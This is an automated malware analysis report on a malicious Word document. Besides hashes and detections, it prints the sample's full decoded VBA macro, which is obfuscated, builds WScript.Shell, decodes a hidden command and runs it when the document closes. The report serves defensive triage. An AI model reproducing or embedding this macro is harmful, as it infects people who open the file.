Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dee5e465fc4959e0…

MALICIOUS

Office (OOXML)

57.6 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-02-04
MD5: 1a453d07485b6cb2c889d2676d4cf67e SHA-1: bad636002e12d41fcc6e0f5ca38a5b8879d3d412 SHA-256: dee5e465fc4959e019cc6e781d4be278997c34a0465fa36825339e12068119c5
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OOXML document containing VBA macros. The `macros.bas` script uses `CreateObject` and a call to `Application.Run("appoggio")` which reconstructs the string ".Shell" and then calls `demenza` with a long, hex-encoded string. This strongly suggests the script is designed to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-8008733-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-8008733-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2844 bytes
SHA-256: 773e28f4256c2f5c7aa781bc49b7b4305e87b630a080cd3a5632057fb48cabb1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function mondina(creato, lacuna)

  If creato >= 0 And lacuna >= 0 Then
    mondina = creato + lacuna
  End If
End Function

Function appoggio()
  appoggio = Trim(StrReverse("tpircsw") & Replace("SShell", "SS", ".S"))
End Function


Public Function demenza(trifoglio As String)
  If Len(trifoglio) < 4785 Then
    Call CreateObject(Application.Run("appoggio")).Run(trifoglio, (4785 - 4785))
  End If
End Function

Sub Document_Close()
 feralo = urlo("2202044520303445363635050602014043153505014045313511512213303035051402525213471935180645040512274145311535495130154552090645150937452714364345471542092102044736021319394336451817341515224400000813305245474313083019474546044502020931025200494900191316133008093629521728353845471644480303214823483526351707201503392232094540451742253549151320150503200231453030353845471644480303214823481707201503392232094540451725351806450405122741453115354951301545520906451509374527143643454715420921020447360213194915204347531817341515224400000813305245474313083019474546044502020931025200300922342250431924191316133008174225353201331818064504051227414531153549513015455209064515093745271436434547154209210204473602131949152043475318173415152244000031341320523143164336314536452720134715093102520027133108102209223422174242")
 Call Application.Run("demenza", feralo)
End Sub

Function urlo(tulipano)
  randagio = stridulo(tulipano)
  esortato = Trim(vbNullString) & vbNullString
  gemello = Len("c")

  For bruno = 0 To Len(tulipano)
    If (mondina(bruno, gemello)) <= UBound(randagio) Then
    mimosa = randagio(mondina(bruno, gemello))
    isolato = randagio(bruno)
    lavoro = CInt(isolato + mimosa)
    esortato = esortato & Application.Run("evaso", lavoro)
    bruno = mondina(bruno, gemello)
    End If
  Next
  
  urlo = esortato
End Function


Function stridulo(foderato)
    unicodeStr = StrConv(foderato, vbUnicode)
    stridulo = Split(Left(unicodeStr, Len(unicodeStr) - 1), vbNullChar)
End Function




Public Function evaso(ByVal larga As Integer) As String
 reprimere = Array("/", "E", "o", "P", "w", "-", "N", "\", "k", ".", "u", "B", "O", "a", "C", "t", "v", "'", "(", "d", "r", "D", "p", "T", "=", ";", "+", "b", ",", "z", "s", "c", "I", "X", "h", " ", "l", "W", "$", "F", "x", "j", ")", "i", ":", "e", "q", "n", "A", "S", "?", "y", "m", "g")
 realNrs = reprimere
 Dim bruno As Integer
 
 For bruno = 0 To UBound(realNrs)
   If bruno = larga Then
    evaso = Replace(Replace(realNrs(bruno), "[", ""), "]", "")
   End If
 Next
 
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 13312 bytes
SHA-256: 8a996f167127452644443f481dc1d4bc60e9d5cb32b67667cd312de737291f90
Detection
ClamAV: Doc.Malware.Valyria-8008733-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).